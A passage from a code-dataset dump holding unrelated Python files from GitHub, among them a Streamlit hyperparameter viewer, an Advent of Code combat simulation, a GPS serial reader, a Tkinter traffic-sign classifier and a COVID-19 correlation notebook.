len(models_to_delete) == 0:\n st.warning('No models selected')\n else:\n for model in models_to_delete:\n dm.delete_model(project, model)\n st.write('<meta http-equiv=\"refresh\" content=\"0\">', unsafe_allow_html=True)\n \ndef center_data_management():\n st.write('The goal of this app is to help with the __easy visualization of hyperparameters__ of machine learning models and their __influence on the performance__ of the model. It was originally developed to display results of the sklearn GridSearchCV method, however as long your data can be represented in a __.csv format__, it can be analyzed here. __Simply upload your file and start anaylzing.__')\n st.write('A __project__ can contain multiple __models__, which can be compared against each other.')\n st.write('A __model__ contains all the data for one model. Should you upload __multiple files__ at once, they will be __concatenated__. Should you want to __compare different files__ for one model, you can upload them one after another, providing __tags__ for different files. The data will be appended and the tags will be visible in the analysis once multiple tags have been created.')\n \n center_uploader()\n st.write('#')\n center_delete()\n\ndef center_viz(df):\n ''''''\n '''\n ## Parallel plot\n ### This plot allows you to visualize higher-dimensional data and analyze it at a glance.\n '''\n get_cached_experiment(df).display()\n '''\n #\n ## SHAP\n ### This plot helps you discover more details about the influence of individual parameters on the performance of your model.\n '''\n shap_viz(df)\n\ndef main():\n st.title('HyperViz - Analysing Hyperparameters Made Easy')\n \n data = sidebar()\n if data is not None:\n center_viz(data)\n else:\n center_data_management()\n\nif __name__ == '__main__':\n main()\n","repo_name":"F1nnM/HyperViz","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11483,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"28491873520","text":"import time\n\nfrom pages.base.component import Component\n\n\nclass Input(Component):\n \n @property\n def type_of(self) -> str:\n return 'input'\n \n \n def fill(self, value: str, **kwargs):\n element = self.get_presence_element(**kwargs)\n element.click()\n element.clear()\n element.send_keys(value)\n time.sleep(1)\n","repo_name":"RomanAlekseevich/sbis_autotest","sub_path":"pages/base/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16047067209","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nfrom dataclasses import dataclass\nfrom enum import IntEnum, Enum\n\nimport sys\nfrom collections import Counter\nfrom itertools import product\nfrom typing import NamedTuple, Dict, Tuple, Union\nfrom copy import deepcopy\nfrom pprint import PrettyPrinter\n\nINPUT_FILE = \"input.txt\"\n\nELF, GOBLIN, WALL, OPEN_CAVERN = (\"elf\", \"goblin\", \"#\", \".\")\n\npp = PrettyPrinter(indent=4)\n\n\nclass AreaType(Enum):\n WALL = \"#\"\n OPEN_CAVERN = \".\"\n\n\nclass Coordinate(NamedTuple):\n x: int\n y: int\n\n\nclass Area(NamedTuple):\n type: str = \"\"\n\n\n@dataclass\nclass Elf:\n name: str = ELF\n is_attacking: bool = False\n attack_power: int = 3\n hit_points: int = 200\n\n\n@dataclass\nclass Goblin:\n name: str = GOBLIN\n is_attacking: bool = False\n attack_power: int = 3\n hit_points: int = 200\n\n\nvisited_points = set()\ntravel_distances = {} # Counter()\ndirections = [(0, -1), (1, 0), (0, 1), (-1, 0)]\n\n\ndef start_combat(\n area: Dict[Coordinate, Area], units: Dict[Coordinate, Union[Elf, Goblin]]\n):\n round = 0\n while True:\n for starting_coordinate, unit in sorted(\n units.items(), key=lambda item: (item[0][1], item[0][0])\n ):\n print(round)\n new_places = {}\n if isinstance(unit, Goblin):\n targets = {\n coordinate: unit2\n for coordinate, unit2 in units.items()\n if isinstance(unit2, Elf) and unit2.hit_points > 0\n }\n else:\n targets = {\n coordinate: unit2\n for coordinate, unit2 in units.items()\n if isinstance(unit2, Goblin) and unit2.hit_points > 0\n }\n if not targets:\n print(round)\n for key, value in units.items():\n if unit.name == value.name:\n print(value.hit_points)\n return\n in_range_enemies = []\n for end_coordinate, target in targets.items():\n in_range_points = []\n for direction in directions:\n next_point = tuple(sum(x) for x in zip(end_coordinate, direction))\n if next_point in area:\n in_range_points.append(next_point)\n if in_range_points and starting_coordinate in in_range_points:\n in_range_enemies.append((end_coordinate, target))\n if in_range_enemies:\n unit.is_attacking = True\n else:\n unit.is_attacking = False\n\n travel_distances.clear()\n rr = None\n if not unit.is_attacking:\n for end_coordinate, elf in targets.items():\n in_range_poins = []\n for direction in directions:\n next_point = tuple(\n sum(x) for x in zip(end_coordinate, direction)\n )\n if next_point in area and area[next_point].type == OPEN_CAVERN:\n in_range_poins.append(next_point)\n if in_range_poins and starting_coordinate not in in_range_poins:\n for in_range_point in in_range_poins:\n for direction in directions:\n visited_points.clear()\n seen.clear()\n next_dir = tuple(\n sum(x) for x in zip(starting_coordinate, direction)\n )\n if (\n next_dir in area\n and area[next_dir].type == OPEN_CAVERN\n ):\n visited_points.add(starting_coordinate)\n visited_points.add(next_dir)\n #print(starting_coordinate, next_dir, in_range_point, area[in_range_point])\n found = walk(next_dir, in_range_point, area)\n if found:\n travel_distances[\n (next_dir, in_range_point)\n ] = len(visited_points) - 1\n if travel_distances:\n min_distance = min(travel_distances.values())\n possible_distances = {\n coordinates: distance\n for coordinates, distance in travel_distances.items()\n if distance == min_distance\n }\n new_point = sorted(\n possible_distances.items(),\n key=lambda item: (item[0][0][1], item[0][0][0]),\n )[0][0][0]\n if (new_point, starting_coordinate) not in new_places:\n if min_distance == 1:\n unit.frozen = True\n new_places[(new_point, starting_coordinate)] = unit\n\n for places, unit in new_places.items():\n rr = places[0]\n units[places[0]] = unit\n del units[starting_coordinate]\n area[places[0]] = Area(type=unit.name)\n if area[starting_coordinate].type != unit.name:\n area[starting_coordinate] = Area(type=OPEN_CAVERN)\n if isinstance(unit, Goblin):\n targets = {\n coordinate: unit2\n for coordinate, unit2 in units.items()\n if isinstance(unit2, Elf) and unit2.hit_points > 0\n }\n else:\n targets = {\n coordinate: unit2\n for coordinate, unit2 in units.items()\n if isinstance(unit2, Goblin) and unit2.hit_points > 0\n }\n in_range_enemies = []\n ee = starting_coordinate\n if rr:\n ee = rr\n for end_coordinate, target in targets.items():\n in_range_points = []\n for direction in directions:\n next_point = tuple(sum(x) for x in zip(end_coordinate, direction))\n if next_point in area:\n in_range_points.append(next_point)\n if in_range_points and ee in in_range_points:\n in_range_enemies.append((end_coordinate, target))\n if in_range_enemies:\n lowest_hit_point = min(e.hit_points for c, e in in_range_enemies)\n in_range_enemies = [\n (c, e)\n for c, e in in_range_enemies\n if e.hit_points == lowest_hit_point\n ]\n target_coordinate, enemy = sorted(\n in_range_enemies, key=lambda x: (x[0][1], x[0][0])\n )[0]\n enemy.hit_points -= 3\n if enemy.hit_points < 0:\n enemy.hit_points = 0\n area[target_coordinate] = Area(type=OPEN_CAVERN)\n units = {\n starting_coordinate: unit\n for starting_coordinate, unit in units.items()\n if unit.hit_points > 0\n }\n #if round == 2:\n # print()\n # pp.pprint(units)\n # return\n round += 1\n\n\ndef manhattan(p1, p2):\n return abs(p1[0] - p2[0]) + abs(p1[1] - p2[1])\n\nseen = set()\n\ndef walk(start: Coordinate, end: Coordinate, area: Dict[Coordinate, Area]):\n if start == end:\n return True\n new_dirs = {}\n for direction in directions:\n next_dir = tuple(sum(x) for x in zip(start, direction))\n if (\n next_dir in area\n and area[next_dir].type != WALL\n and next_dir not in visited_points and next_dir not in seen\n ):\n new_dirs[next_dir] = manhattan(next_dir, end)\n if not new_dirs:\n seen.add(start)\n #visited_points.remove(start)\n return False\n new_dirs = dict(sorted(new_dirs.items(), key=lambda item: item[1]))\n for next_dir in new_dirs.keys():\n visited_points.add(next_dir)\n found = walk(next_dir, end, area)\n if found:\n return True\n else:\n seen.add(next_dir)\n #visited_points.remove(next_dir)\n return False\n\n\ndef scan_area() -> Tuple:\n area = {}\n units = {}\n with open(INPUT_FILE, \"r\") as f_handle:\n for y, line in enumerate(f_handle):\n line = line.rstrip(\"\\n\")\n if line:\n for x, area_type in enumerate(line):\n if area_type in (\"G\", \"E\"):\n if area_type == \"G\":\n units[Coordinate(x=x, y=y)] = Goblin()\n else:\n units[Coordinate(x=x, y=y)] = Elf()\n area[Coordinate(x=x, y=y)] = Area(type=area_type)\n\n return area, units\n\n\ndef main():\n area, units = scan_area()\n #walk(start=(11,11),end=(27,18),area=area)\n start_combat(area, units)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"mikeleppane/Advent_of_Code","sub_path":"2018/Day_15/solution_part1.py","file_name":"solution_part1.py","file_ext":"py","file_size_in_byte":9326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3888495926","text":"# -*- coding: utf-8 -*-\n\"\"\"\nParameter factory functions\n\"\"\"\n#\n# Imports\n#\nfrom .base import ParameterMixin\n\n\n#\n# Factory functions\n#\n\ndef bound_mixin(name, checker, cls_name=None):\n \"\"\"Creates a new mixin class for bounded parameters\n\n This factory function makes creating bound mixins very simple, you only\n need to provide the `name` for the attribute on the resulting class for\n this particular boundary condition, and provide a callable `checker`\n to perform the validation. The checker call needs to look like this:\n\n .. code-block: python\n\n def checker(value, boundary):\n ...\n\n The call should return True when the value is within the boundary and False\n when it's not. The `checker` doesn't necessarily have to be a function,\n it just needs to be callable.\n\n Parameters\n ----------\n name : str\n Name of the property holding the bound's value.\n checker : callable\n Callable object/function to assess the boundary condition.\n cls_name : str, optional\n Name for the newly created class type (defaults to `name` +\n 'BoundMixin').\n\n Returns\n -------\n ParameterMixin\n New parameter mixin class for the bound specified.\n\n Raises\n ------\n ValueError\n If the given `checker` is not callable.\n\n \"\"\"\n if not callable(checker):\n raise ValueError(\"The checker must be callable\")\n if not cls_name:\n cls_name = '%sBoundMixin' % name.replace(' ', '')\n cls_name = cls_name[0].upper() + cls_name[1:]\n\n prop_name = name.lower().replace(' ', '_')\n var_name = '_%s' % prop_name\n\n def _w_property_get(self):\n return getattr(self, var_name)\n _w_property_get.func = '_get_%s' % prop_name\n\n def _w_property_set(self, value):\n setattr(self, var_name, value)\n _w_property_set.func = '_set_%s' % prop_name\n\n w_property = property(\n _w_property_get, _w_property_set, None, \"The %s bound\" % name\n )\n\n class _NewBoundMixin(ParameterMixin):\n\n def __init__(self, *args, **kwargs):\n setattr(self, var_name, None)\n prop_val = kwargs.pop(prop_name, None)\n\n super(_NewBoundMixin, self).__init__(*args, **kwargs)\n\n if prop_val:\n setattr(self, prop_name, prop_val)\n\n def _check_helper(self, value, raise_exceptions=True) -> bool:\n ret = super(_NewBoundMixin, self)._check_helper(\n value, raise_exceptions=raise_exceptions\n )\n return ret and checker(value, getattr(self, var_name))\n\n def _disp_props(self):\n ret = super(_NewBoundMixin, self)._disp_props()\n bnd = getattr(self, prop_name, None)\n if bnd:\n ret.append('%s=%s' % (prop_name, bnd))\n return ret\n\n return type(cls_name, (_NewBoundMixin,), {prop_name: w_property})\n","repo_name":"douglasdaly/spines","sub_path":"src/spines/parameters/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2715959957","text":"\nclass Solution:\n # @param A : list of integers\n # @return an integer\n def solve(self, arr):\n\n n = len(arr)\n pos = -1\n for i in range(n-1):\n\n if arr[i] > arr[i+1]:\n pos = i\n break\n\n if pos == -1:\n return 1\n\n if(arr[0] < arr[n-1] and arr[pos+1] < arr[0]):\n return 0\n for i in range(pos+1, n-1):\n if arr[i] > arr[i+1]:\n return 0\n\n return 1\n","repo_name":"adiwate32/DS_and_Algo","sub_path":"src/module1/advance_dsa_contest_1/Librarian_and_rotated_array.pu.py","file_name":"Librarian_and_rotated_array.pu.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74500215521","text":"def partition(x):\n con = None\n if x % 2 == 0:\n tup = (x, con)\n else:\n tup = (con, x)\n return tup\n\n\ndef partition_list(l):\n evenArr = []\n oddArr = []\n for i in l:\n if(i % 2 == 0):\n ans = partition(i)\n evenArr.append(ans)\n else:\n ans = partition(i)\n oddArr.append(ans)\n finalAns = (evenArr, oddArr)\n return finalAns\n\n\n# value = int(input(\"Please enter the integer value\\n\"))\n\n\nlist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nresults = partition_list(list)\n\nprint(results)","repo_name":"Zormelo-Alex/GlblCd-Tutorial-Sesh","sub_path":"Intro/tuples.py","file_name":"tuples.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33050105353","text":"#!/usr/bin/python3\nimport serial\nimport time\nimport sys\n\ndef sendCommand(command):\n\tglobal ser\n\tprint(\"COMMAND:\",command)\n\tser.write(command.encode())\n\tser.flushInput()\n\nser = serial.Serial(\"/dev/ttyUSB0\",115200)\n\nW_buff = [\"AT+CGNSPWR=1\\r\\n\", \"AT+CGNSSEQ=\\\"RMC\\\"\\r\\n\", \"AT+CGNSINF\\r\\n\", \"AT+CGNSURC=2\\r\\n\",\"AT+CGNSTST=1\\r\\n\"]\n\npowerOn = \"AT+CGNSPWR=1\\r\\n\"\nbaudRate = \"AT+CGNSIPR?\\r\\n\"\nnavigation = \"AT+CGNSINF\\r\\n\"\nstatus = \"AT+CGNSTST=1\\r\\n\"\n\nsendCommand(powerOn)\ndata = \"\"\n\nbufferedBytes = 0\nwhile True:\n\tbufferedBytes = ser.inWaiting()\n\tprint(\"bytes to be read: \", bufferedBytes)\n\ttime.sleep(0.2)\n\tif bufferedBytes >1: break\ndata += ser.read(ser.inWaiting()).decode()\nprint(data)\n\n\nprint(\"next command:\", baudRate)\ntime.sleep(3)\ndata =\"\"\nsendCommand(baudRate)\nwhile True:\n\tprint(ser.inWaiting())\n\twhile ser.inWaiting() > 0:\n\t\tdata += ser.read(ser.inWaiting()).decode()\n\tif len(data) > 1:\n\t\tprint(\"Response:\", data)\n\t\tbreak\n\ttime.sleep(1)\n\n\nprint(\"next command:\", navigation)\ntime.sleep(1)\ndata =\"\"\nsendCommand(navigation)\nwhile True:\n\tprint(ser.inWaiting())\n\twhile ser.inWaiting() > 0:\n\t\tdata += ser.read(ser.inWaiting()).decode()\n\tif len(data) > 1:\n\t\tprint(\"Response:\\n------------------\\n\", data, \"\\n----------------\")\n\t\tbreak\n\ttime.sleep(1)\n\n\n\ndef toTimeString(timeRMC):\n\ttimeString = \"\"\n\thours = int(timeRMC/10000)\n\tminutes = int((timeRMC - hours*10000)/100)\n\tseconds = int(timeRMC - minutes*100 - hours*10000)\n\ttimeString+= \"%02d:%02d:%02dUT\"%(hours, minutes, seconds)\n\treturn timeString\n\t\ndef toDecimal(latlonRMC):\n\tdegrees = int(latlonRMC/100)\n\tminutes = latlonRMC - degrees*100\n\tdecimal = minutes/60\n\tdegrees = degrees + decimal\n\treturn \"%5f\"%degrees\n\t\ndef toDateString(dateRMC):\n\tday = dateRMC[2:4]\n\tmonth = dateRMC[0:2]\n\tyear = \"20\" + dateRMC[4:6]\n\treturn \"%s-%s-%s\"%(year, month, day)\n\nprint(\"next command\")\ntime.sleep(1)\ndata =\"\"\nsendCommand(status)\n\ntry:\n\twhile True:\n\t\twhile ser.inWaiting() > 0:\n\t\t\tdata += ser.read(ser.inWaiting()).decode()\n\t\tif len(data) > 1:\n\t\t\t# print(\"len:\", len(data))\n\t\t\t# print(\"Response:\", data)\n\t\t\tlines = data.split('\\n')\n\t\t\tRMClines = []\n\t\t\tfor line in lines:\n\t\t\t\tfields = line.split(',')\n\t\t\t\tif fields[0] == \"$GNRMC\": RMClines.append(line)\n\t\t\t\n\t\t\tfields = RMClines[-1].split(',')\n\t\t\tif len(fields) < 10:\n\t\t\t\tfields = RMClines[-2].split(',')\n\t\t\t\n\t\t\ttry:\n\t\t\t\tstatus = fields[2]\n\t\t\t\tif (status=='V'): print (\"no GPS fix\")\n\t\t\t\telse: \n\t\t\t\t\tlatitude = float(fields[3])\n\t\t\t\t\tlatCardinal = fields[4]\n\t\t\t\t\tlongitude = float(fields[5])\n\t\t\t\t\tlonCardinal = fields[6]\n\t\t\t\t\ttimeRMC = float(fields[1])\n\t\t\t\t\tdateRMC = fields[9]\n\t\t\t\t\tprint(toDateString(dateRMC), toTimeString(timeRMC), toDecimal(latitude) + latCardinal, toDecimal(longitude)+ lonCardinal)\n\t\t\texcept:\n\t\t\t\t\tprint(\"...waiting...\")\n\t\t\tdata =\"\"\n\t\ttime.sleep(10)\n\nexcept KeyboardInterrupt:\n\tif ser != None:\n\t\tprint(\"Clearing serial bus.\")\n\t\tser.close()\n\t\tsys.exit()\n","repo_name":"rashley2712/meteopi","sub_path":"gps2.py","file_name":"gps2.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5476728348","text":"# -*- coding: utf-8 -*-\n\n# Learn more: https://github.com/kennethreitz/setup.py\n\nfrom setuptools import setup, find_packages\n\n\nwith open('README.rst') as f:\n readme = f.read()\n\nwith open('LICENSE') as f:\n license = f.read()\n\nsetup(\n name='src',\n version='1.0',\n description='Source code for my project',\n long_description=readme,\n classifiers=[\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Anomaly Detection :: Machine Learning',\n ],\n author='Tzu-Hua Kao',\n author_email='tzu-hua.kao@campus.tu-berlin.de',\n url='https://github.com/KaoCircle/anomalyDetection',\n license=license,\n packages=find_packages(exclude=('tests', 'docs')), # same as name\n # install_requires=['bar', 'greek'], #external packages as dependencies\n # scripts=[\n # 'scripts/cool',\n # 'scripts/skype',\n # ]\n # ref:https://stackoverflow.com/questions/1471994/what-is-setup-py\n)\n","repo_name":"KaoCircle/anomalyDetection","sub_path":"project/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"13976490949","text":"f = open('fruits.txt')\nfruits_raw = f.readlines()\n\nfruits = []\nfor row in fruits_raw:\n fruits += [row.strip()]\n\nf.close() #Windows can't do stuff with your file as long as Python has it open.\n\n\n'''\nWhen you use this simple method, the rows will contain '\\n' characters, \nwhich are line breaks.\nYou can get rid of those and other white spaces at the start and end of \nlines using the string.strip() method. The following code loops through your \nraw list and strips the white space out of each row. \n\nIn your Python window, look at the items from fruits by indexing them.\nFor example, fruits[0] or fruits[3:5]\n\nNow you can easily loop through the fruits, or select a random fruit.\n\nIf you want to add or remove fruits from the list, just edit the text file, \nand the code will still work. This makes it easy to change your data.\n'''\n\n","repo_name":"weardo98/Github","sub_path":"python_file_input/file_open_example.py","file_name":"file_open_example.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"11728977058","text":"import torch\nfrom torch.autograd import Variable\nfrom utils import *\nfrom os.path import join\nimport math\nimport numpy as np\n\n\ndef test(args, model, test_loader, epoch):\n \"\"\"\n In this function:\n 1) load dataset\n 2) Run model\n 3) Print results\n \"\"\"\n\n \"\"\" Dataset \"\"\"\n model.eval()\n volatile = True\n\n \"\"\" Batch Iteration \"\"\"\n for batch_idx, (image, target) in enumerate(test_loader):\n\n \"\"\" Data \"\"\"\n if args.is_cuda:\n image = image.cuda()\n\n \"\"\" Run Model and Get Loss \"\"\"\n hologram, output = model(image)\n hologram = torch.squeeze(hologram)\n hologram = hologram.cpu().detach().numpy()\n output = torch.squeeze(output)\n output = output.cpu().detach().numpy()\n\n \"\"\" print images \"\"\"\n for i in range(len(test_loader.dataset)):\n holo = hologram[i]\n h2i = abs(np.fft.fft2(np.exp(1j * holo * 2 * math.pi)))\n\n save_holo_path = join(args.save_image_path, str(i+1)+'_holo_'+str(epoch+1)+'.png')\n save_recon_path = join(args.save_image_path, str(i+1)+'_recon_'+str(epoch+1)+'.png')\n save_output_path = join(args.save_image_path, str(i+1)+'_output_'+str(epoch+1)+'.png')\n\n imwrite(h2i, save_recon_path)\n imwrite(holo, save_holo_path)\n imwrite(output[i], save_output_path)\n","repo_name":"wonjongRyu/benchmark","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70267829601","text":"import tkinter as tk\nfrom tkinter import filedialog\nfrom tkinter import *\nfrom PIL import ImageTk, Image\nimport numpy\nfrom numpy import array\n\nfrom keras.models import load_model\nmodel = load_model('traffic_classifier.h5')\n\nclasses = { 1:'Hız Limiti (20km/h)',\n 2:'Hız Limiti (30km/h)',\n 3:'Hız Limiti (50km/h)',\n 4:'Hız Limiti (60km/h)',\n 5:'Hız Limiti (70km/h)',\n 6:'Hız Limiti (80km/h)',\n 7:'Hız Limiti Bitti (80km/h)',\n 8:'Hız Limiti (100km/h)',\n 9:'Hız Limiti (120km/h)',\n 10:'Geçiş yok',\n 11:'3.5 ton üzerindeki araçlara geçiş yok',\n 12:'Kavşakta geçiş hakkı',\n 13:'Öncelikli yol',\n 14:'Yol ver',\n 15:'Dur',\n 16:'Araç giremez',\n 17:'3.5 ton üzerindeki araçlara yasak',\n 18:'Girilmez',\n 19:'Dikkat',\n 20:'Sola tehlikeli viraj',\n 21:'Sağa tehlikeli viraj',\n 22:'İki yönlü viraj',\n 23:'Engebeli yol',\n 24:'Kaygan yol',\n 25:'Sağda yol daralıyor',\n 26:'Yol çalışması',\n 27:'Trafik ışığı',\n 28:'Yaya geçidi',\n 29:'Çocuk geçidi',\n 30:'Bisiklet geçidi',\n 31:'Buzlanma olabilir dikkat et',\n 32:'Vahşi hayvan geçebilir',\n 33:'Geçiş limitleri',\n 34:'Sağa dönün',\n 35:'Sola dönün',\n 36:'Sadece düz gidin',\n 37:'Düz veya sağa git',\n 38:'Düz veya sola git',\n 39:'Sağda kal',\n 40:'Solda kal',\n 41:'Mecburi döner kavşak',\n 42:'Geçiş yasağı bitti',\n 43:'3.5 ton üzerindeki araçlara yasak bitti' }\n\ntop=tk.Tk()\ntop.geometry('800x600')\ntop.title('Trafik İşaretleri Sınıflandırma')\ntop.configure(background='#CDCDCD')\nlabel=Label(top,background='#CDCDCD', font=('arial',15,'bold'))\nsign_image = Label(top)\ndef classify(file_path):\n global label_packed\n image = Image.open(file_path)\n image = image.resize((30,30))\n image = numpy.expand_dims(image, axis=0)\n image = numpy.array(image)\n predict = model.predict([image])[0]\n en_buyuk = predict[0]\n en_buyuk_indis = 0\n for i in range(len(predict)):\n if en_buyuk<predict[i]:\n en_buyuk=predict[i]\n en_buyuk_indis = i\n sign = classes[en_buyuk_indis+1]\n print(sign)\n label.configure(foreground='#011638', text=sign)\ndef show_classify_button(file_path):\n print(file_path)\n classify_b=Button(top,text=\"Test Et\",command=lambda: classify(file_path),padx=10,pady=5)\n classify_b.configure(background='#364156', foreground='white',font=('arial',10,'bold'))\n classify_b.place(relx=0.79,rely=0.46)\ndef upload_image():\n try:\n file_path=filedialog.askopenfilename()\n uploaded=Image.open(file_path)\n uploaded.thumbnail(((top.winfo_width()/2.25),(top.winfo_height()/2.25)))\n im=ImageTk.PhotoImage(uploaded)\n sign_image.configure(image=im)\n sign_image.image=im\n label.configure(text='')\n show_classify_button(file_path)\n except:\n pass\nupload=Button(top,text=\"Görsel Seç\",command=upload_image,padx=10,pady=5)\nupload.configure(background='#364156', foreground='white',font=('arial',10,'bold'))\nupload.pack(side=BOTTOM,pady=50)\nsign_image.pack(side=BOTTOM,expand=True)\nlabel.pack(side=BOTTOM,expand=True)\nheading = Label(top, text=\"Trafik İşaretini Kontrol Et\",pady=20, font=('arial',20,'bold'))\nheading.configure(background='#CDCDCD',foreground='#364156')\nheading.pack()\ntop.mainloop()","repo_name":"alperragib/VehicleSignRecognitionCNN","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3612,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"705830561","text":"import os\nfrom glob import glob as gl\nfrom threading import Thread\n\nimport dropbox\nfrom tqdm import tqdm\n\n\nclass SendThread(Thread):\n\n def __init__(self, token: str, path: str, glob: str):\n Thread.__init__(self)\n self.__dbx = dropbox.Dropbox(token)\n self.__path = path\n self.__glob = glob\n\n def run(self) -> None:\n client = self.__dbx.users_get_current_account()\n file_paths = gl(os.path.join(self.__path, self.__glob))\n\n n = 5\n for i in tqdm(range(n)):\n with open(file_paths[i], 'rb') as f:\n self.__dbx.files_upload(f.read(), f'/{os.path.basename(file_paths[i])}', autorename=True)\n","repo_name":"Tesseract98/Save-Files-To-Cloud","sub_path":"Python/threads/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29590504361","text":"import os\nfrom PIL import Image\n\n# Set the path of the folder containing the images\npath = r'D:\\New Volume E\\CAREER\\Development\\v2pdf\\dissimilar_images'\n\n\n\n# Set the filename of the output PDF\noutput_filename = \"output.pdf\"\n\n# Create a new PDF\npdf = Image.new(\"RGB\", (1, 1), \"white\")\n\n# Iterate over all images in the folder\nfor filename in os.listdir(path):\n try:\n # Load the current image\n image = Image.open(os.path.join(path, filename))\n\n # Add the image to the PDF\n if image.mode != \"RGB\":\n image = image.convert(\"RGB\")\n pdf = Image.new(\"RGB\", (max(pdf.size[0], image.size[0]), pdf.size[1] + image.size[1]), \"white\")\n pdf.paste(pdf, (0, 0))\n pdf.paste(image, (0, pdf.size[1] - image.size[1]))\n except Exception as e:\n print(f\"Error processing file {filename}: {e}\")\n\n# Save the PDF\npdf.save(output_filename, \"PDF\", resolution=100.0)\n","repo_name":"RahulNegi123/video_2_PDF","sub_path":"dissimilar_frames_to_pdf.py","file_name":"dissimilar_frames_to_pdf.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22847352237","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[405]:\n\n\nimport torch\nfrom torch import nn\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport time\nfrom sklearn.preprocessing import LabelEncoder\n\n\n# # draw the coefficient scale\n\n# In[406]:\n\n\ndf = pd.read_csv('covid_19.csv')\n\ndf_num = df.drop(['Country/Region', 'Lat', 'Long'], axis=1)\ndf_num = df_num.drop(index=[0])\ndf_arr = df_num.to_numpy()\n\n# change df to array to compute coefficient\nfor i in range(len(df_num)):\n for j in range(df_num.shape[1]):\n df_arr[i][j] = float(df_arr[i][j])\n\ndf_float = df_arr.astype(float)\n\n# difference sequence\n\ndiff = np.zeros((185,82))\nfor i in range(df_float.shape[0]):\n for j in range(df_float.shape[1]-1):\n diff[i][j] = df_float[i][j+1] - df_float[i][j]\n\ndiff = np.delete(diff, -1, axis=1)\n\n\ncoef_pairs = []\nfor x in range(diff.shape[0]-1):\n for y in range(x+1, diff.shape[0]):\n coef = np.corrcoef(diff[x], diff[y], rowvar=True)\n coef_pairs.append(coef[1][0])\n\n\n#change list to df for coloring\ncoef_to_df = []\ncoef_to_df_each = []\nj = 0\nnext_start = 0\nfor i in range(df_float.shape[0]-1):\n for j in range(df_float.shape[0]-1-i):\n coef_to_df_each.append(coef_pairs[next_start + j])\n# print(j)\n coef_to_df.append(coef_to_df_each)\n next_start = next_start + len(coef_to_df_each)\n coef_to_df_each = []\n\n# filling zeros in the upper triangle \nzero = [0]*185\ncoef_to_df.append(zero)\n\n\ndataframe_list = []\nfor i in range(185):\n# print(i)\n temp_list = []\n for k in range(i+1):\n temp_list.append(0)\n if i != 184:\n for x in coef_to_df[i]:\n temp_list.append(x)\n dataframe_list.append(temp_list)\n\nd = pd.DataFrame(np.zeros((185, 185)))\nfor i in range(185):\n d[i]=dataframe_list[i]\n \n# s will be the colored coefficint \ncm = sns.light_palette(\"green\", as_cmap=True)\ns = d.style.background_gradient(cmap=cm)\n\n\n# # assign train, test data into loader\n\n# In[407]:\n\n\nC = set()\nfor i in range(185):\n for j in range(185):\n if d.iloc[i,j]>0.8:\n C.add(i)\n C.add(j)\n \nx_data = []\ny_data = []\nstart_index = 0\n# L = interval\nL = 30\nfor x in (C):\n country_data = list(df_num.iloc[x:x+1,0:].values[0]) \n# print(country_data)\n for i in range(0,df_num.shape[1]-L):\n x_data.append(country_data[i:i+L])\n if country_data[i+L]-country_data[i+L-1]:\n y_data.append(1)\n else:\n y_data.append(0)\n\n\n# In[408]:\n\n\nx_data\n\n\n# In[409]:\n\n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(\n x_data, y_data, test_size=0.33, random_state=42)\n\n\n# ### Run only L=20 START\n\n# In[410]:\n\n\ndf_diff = pd.DataFrame(diff)\ndf_diff_last20 = df_diff.iloc[0:,-30:]\nall_last20 = []\nfor i in range(185):\n all_last20.append(list(df_diff_last20.iloc[0:1,0:]))\n\n\n# In[411]:\n\n\nlen(last_20_y_test)\n\n\n# In[412]:\n\n\n# add data for predicting(last 20 data)\nlast_20_x_test = []\nlast_20_y_test = []\nfor x in all_last20:\n last_20_x_test.append(x)\nfor i in range(185):\n last_20_y_test.append(0)\n\n\n# ### Run only L=20 START\n\n# In[413]:\n\n\nX_train = np.array(X_train) \nX_test = np.array(X_test)\ny_train = np.array(y_train)\ny_test = np.array(y_test)\nlast_20_x_test = np.array(last_20_x_test)\nlast_20_y_test = np.array(last_20_y_test)\n\n\n# In[414]:\n\n\nlast_20_x_test[0]\n\n\n# In[415]:\n\n\nimport torch.utils.data as Data\n\n\nX_train = torch.from_numpy(X_train)\nX_test = torch.from_numpy(X_test)\ny_train = 